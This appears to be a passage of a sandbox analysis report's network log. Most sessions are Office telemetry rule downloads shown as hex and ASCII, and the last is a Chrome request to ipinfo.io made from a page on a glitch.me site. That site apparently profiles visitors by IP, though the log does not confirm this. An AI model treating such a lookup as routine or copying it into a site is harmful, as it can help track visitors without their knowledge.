                                                          2024-12-03 02:27:55 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          52192.168.2.44980613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:55 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:56 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:55 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 415
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                          ETag: "0x8DC582B988EBD12"
                                                          x-ms-request-id: 5aec2b48-201e-0085-7d6b-4334e3000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022755Z-174f78459685m244hC1EWRgp2c000000154g00000000asv1
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:56 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          53192.168.2.44980713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:55 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:56 UTC491INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:55 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 471
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                          ETag: "0x8DC582BB5815C4C"
                                                          x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022755Z-174f7845968kvnqxhC1EWRmf3g0000000s1000000000hhfp
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          X-Cache-Info: L1_T2
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:56 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          54192.168.2.44980813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:55 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:56 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:55 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 419
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                          ETag: "0x8DC582BB32BB5CB"
                                                          x-ms-request-id: 2132beec-901e-00ac-46aa-42b69e000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022755Z-174f7845968glpgnhC1EWR7uec00000015b000000000rg14
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:56 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          55192.168.2.44980913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:55 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:56 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:55 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 494
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                          ETag: "0x8DC582BB8972972"
                                                          x-ms-request-id: 1e31e9ea-701e-0098-028a-43395f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022755Z-174f7845968cdxdrhC1EWRg0en00000015ag000000004dxt
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:56 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          56192.168.2.44981013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:57 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:57 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:57 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 420
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                          ETag: "0x8DC582B9DAE3EC0"
                                                          x-ms-request-id: 06c834e2-b01e-0001-1c8a-4346e2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022757Z-174f78459685m244hC1EWRgp2c0000001580000000000g7v
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:57 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          57192.168.2.44981313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:57 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:58 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:58 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 486
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                          ETag: "0x8DC582B92FCB436"
                                                          x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022758Z-174f7845968zgtf6hC1EWRqd8s0000000yag0000000042eh
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:58 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          58192.168.2.44981113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:57 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:58 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:58 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 472
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                          ETag: "0x8DC582B9D43097E"
                                                          x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022758Z-174f7845968swgbqhC1EWRmnb400000015d000000000gfff
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:58 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          59192.168.2.44981213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:57 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:58 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:58 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 427
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                          ETag: "0x8DC582BA909FA21"
                                                          x-ms-request-id: 777c0ba6-d01e-0082-0f16-41e489000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022758Z-174f7845968pght8hC1EWRyvxg00000008h0000000002x00
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:58 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          60192.168.2.44981413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:58 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:58 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:58 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 423
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                          ETag: "0x8DC582BB7564CE8"
                                                          x-ms-request-id: 3b8b6251-d01e-0049-3c33-44e7dc000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022758Z-174f78459685m244hC1EWRgp2c000000152g00000000g79t
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:58 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          61192.168.2.44981513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:59 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:00 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:00 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 478
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                          ETag: "0x8DC582B9B233827"
                                                          x-ms-request-id: ef6d0e99-401e-0067-3dc7-4309c2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022800Z-174f7845968nxc96hC1EWRspw800000014z000000000hw08
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:00 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          62192.168.2.44982034.117.59.81443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:59 UTC577OUTGET /json HTTP/1.1
                                                          Host: ipinfo.io
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://troubled-worried-bamboo.glitch.me
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://troubled-worried-bamboo.glitch.me/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:28:00 UTC345INHTTP/1.1 200 OK
                                                          access-control-allow-origin: *
                                                          Content-Length: 321
                                                          content-type: application/json; charset=utf-8
                                                          date: Tue, 03 Dec 2024 02:28:00 GMT
                                                          x-content-type-options: nosniff
                                                          via: 1.1 google
                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close
